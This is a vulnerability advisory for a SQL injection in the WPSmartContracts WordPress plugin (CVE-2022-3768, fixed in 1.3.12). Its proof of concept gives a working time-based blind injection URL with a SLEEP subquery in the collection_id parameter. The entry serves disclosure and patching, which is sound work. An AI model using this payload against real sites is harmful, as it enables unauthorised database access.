WordPress Plugin Vulnerabilities

WPSmartContracts < 1.3.12 - Author+ SQLi

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as author

Proof of Concept

Logon as an author and open the following URL, which will result in a delayed response

https://example.com/wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(4)))hlAf)&uid=1

Affects Plugins

Plugin icon
wp-smart-contracts
Fixed in 1.3.12

References

CVE
CVE-2022-3768
URL
https://bulletin.iese.de/post/wp-smart-contracts_1-3-11/

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
Kunal Sharma (University of Kaiserslautern), Daniel Krohmer (Fraunhofer IESE)
Submitter
Kunal Sharma
Submitter website
https://iese.fraunhofer.de/en.html
Verified
Yes
WPVDB ID
1d8bf5bb-5a17-49b7-a5ba-5f2866e1f8a3

Timeline

Publicly Published
2022-11-07 (about 1 years ago)
Added
2022-11-07 (about 1 years ago)
Last Updated
2022-12-02 (about 1 years ago)

Other

Published
Title
Published
2024-02-27
Title
WP eCommerce <= 3.15.1 - Unauthenticated SQL Injection
Published
2023-10-27
Title
Article Analytics <= 1.0 - Unauthenticated SQL injection
Published
2023-11-07
Title
Who Hit The Page – Hit Counter <= 1.4.14.3 - Authenticated (Administrator+) SQL Injection
Published
2023-12-05
Title
Soledad < 8.4.2 - Authenticated (Contributor+) SQL Injection
Published
2015-11-24
Title
WordPress Meta Robots <= 2.1 - Authenticated Blind SQL Injection